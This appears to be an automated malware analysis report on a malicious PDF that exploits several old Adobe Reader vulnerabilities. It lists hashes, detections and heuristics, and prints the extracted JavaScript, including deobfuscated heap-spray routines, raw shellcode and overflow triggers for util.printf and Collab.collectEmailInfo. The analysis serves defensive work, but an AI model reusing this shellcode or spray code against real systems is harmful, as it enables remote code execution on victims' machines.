Malicious PDF — malware analysis report

Static analysis result for SHA-256 0251c6e8a85801f1…

MALICIOUS

PDF

118.7 KB
MD5: c0f3f085fa50a101a504adfd4fcbec14 SHA-1: 8ec9afb02ae14a0f38946594535a76535b78b159 SHA-256: 0251c6e8a85801f1d3c238f3e03322ae08ea75e570e73e228f23f90b250814c1
676 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF contains obfuscated JavaScript that exploits multiple CVEs in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload, as indicated by the 'Pdf.Exploit.Agent-36086' and 'Js.Exploit.Shellcode-18' detections. The embedded JavaScript is heavily obfuscated and uses techniques like eval() and String.fromCharCode() to hide its malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
541998c66b4742bbc22c813630b67d3722a2ccaf9f3b0f13a268b3b764869ddd		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 627991 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function crV(gFQ){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
28262790445e308ca681fabb6b339f96a1aefd649be4a1b17e58422ed54f5723		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u09FF%uE951%u6D0F%uD9F0%u090F%u6251%u054F%u99DA%uA413%u99DA%u8807%uE995%uF6F8%u62AE%uB2E3%uE919%u090F%uE93B%u8767%uE71F%u61E3%u17C9%u0785%u0639%uE9C1%u8131%uC33C%uB2DB%u3167%u4573%u61E8%uA0BB%uE185%u3239%u2A85%u81B8%u4554%u344B%uE567%uEAC6%uE103%uE84E%u090F%uEDD8%u8A24%uEDBA%uC904%u1824%u6767%u9D34%u610F%u8026%u6061%u1605%u215A%uB008%uC904%u6D5E%u09F7%uE951%uF984%uB1EA%u090F%u8351%u610F%uAD78%u5EE7%uA039%u06E2%u812F%u4284%uB6B2%uE9E7%uE951%u800F%uC255%uE28C%uE255%u7CCF%u64A0%u098A%uE953%u590F%u1639%u090F%u1651%u3D5A%u6CDC%u0D0F%uE951%u635F%u8351%u840F%uE9D4%u090D%uB951%u5CF0%u6469%u09BA%uE955%uA50F%u295B%uF27A%u2E1F%u2709%u9134%uCE6A%uED17%u090F%uE951%u8C82%uED51%u090F%u2062%u595E%uBCAE%u4933%u6D5E%u098F%uE951%u8047%uA514%u0967%uE911%u630F%u1611%u415A%u295A%u677B%uACD8%u636F%u8351%u630F%u8351%u630F%u1651%u595A%u295A%u537B%uE93B%u0967%uE951%u630B%u8351%uE00F%uE9FB%u090F%u1601%u5D5A%u295A%u4B7B%uACD8%u8467%u8D14%u615F%uA951%u090F%u9CAE%uF66F%u8124%u5CF0%uE209%u7DCF%u6244%u6D4A%u295A%u077B%u9CAE%uF66B%u8924%u7CF0%u161D%u495A%u3CBA%u7CF0%u161D%u4D5A%u207A%u584E%u6CDC%u0D0F%uE951%uF65F%uC504%uF665%uBCAE%u5C3F%u05DA%u7484%uE259%u7DF0%uBA1A%uD784%u6207%u357C%u9DDA%u713C%u1A52%u8259%uC927%uFA0C%u2062%u4846%uEAFC%u5FCC%u1F62%uB700%uD141%u7DD9%u2859%u04C1%u1B52%uE24F%uD2A0%u57F1%u0C24%u8255%u62BA%u2D55%u3452%u8269%uA25D%u5384%uEA4D%u82D2%u6255%uCC0C%uB20F%u0BE4%u2962%uCB52%uE955%u58E7%u16AE%u61F0%u9D25%u337F%uC67E%u7A6E%u8838%u7961%u9B3E%u7D61%u8023%u277F%u8632%u2662%u9B25%u6D6E%uC634%u6A30%uD86C%u7A29%u8D38%u3032%uDC61%u6F6C%u8C32%u303E%u8D60%u6F6E%u8D67%u3C6D%u8D32%u686A%u8F34%u3F6A%u8865%u3B6C%uD132%u2F6A%uD422%u093C%uE951%u000F");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u09FF%uE951%u6D0F%uD9F0%u090F%u6251%u054F%u99DA%uA413%u99DA%u8807%uE995%uF6F8%u62AE%uB2E3%uE919%u090F%uE93B%u8767%uE71F%u61E3%u17C9%u0785%u0639%uE9C1%u8131%uC33C%uB2DB%u3167%u4573%u61E8%uA0BB%uE185%u3239%u2A85%u81B8%u4554%u344B%uE567%uEAC6%uE103%uE84E%u090F%uEDD8%u8A24%uEDBA%uC904%u1824%u6767%u9D34%u610F%u8026%u6061%u1605%u215A%uB008%uC904%u6D5E%u09F7%uE951%uF984%uB1EA%u090F%u8351%u610F%uAD78%u5EE7%uA039%u06E2%u812F%u4284%uB6B2%uE9E7%uE951%u800F%uC255%uE28C%uE255%u7CCF%u64A0%u098A%uE953%u590F%u1639%u090F%u1651%u3D5A%u6CDC%u0D0F%uE951%u635F%u8351%u840F%uE9D4%u090D%uB951%u5CF0%u6469%u09BA%uE955%uA50F%u295B%uF27A%u2E1F%u2709%u9134%uCE6A%uED17%u090F%uE951%u8C82%uED51%u090F%u2062%u595E%uBCAE%u4933%u6D5E%u098F%uE951%u8047%uA514%u0967%uE911%u630F%u1611%u415A%u295A%u677B%uACD8%u636F%u8351%u630F%u8351%u630F%u1651%u595A%u295A%u537B%uE93B%u0967%uE951%u630B%u8351%uE00F%uE9FB%u090F%u1601%u5D5A%u295A%u4B7B%uACD8%u8467%u8D14%u615F%uA951%u090F%u9CAE%uF66F%u8124%u5CF0%uE209%u7DCF%u6244%u6D4A%u295A%u077B%u9CAE%uF66B%u8924%u7CF0%u161D%u495A%u3CBA%u7CF0%u161D%u4D5A%u207A%u584E%u6CDC%u0D0F%uE951%uF65F%uC504%uF665%uBCAE%u5C3F%u05DA%u7484%uE259%u7DF0
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.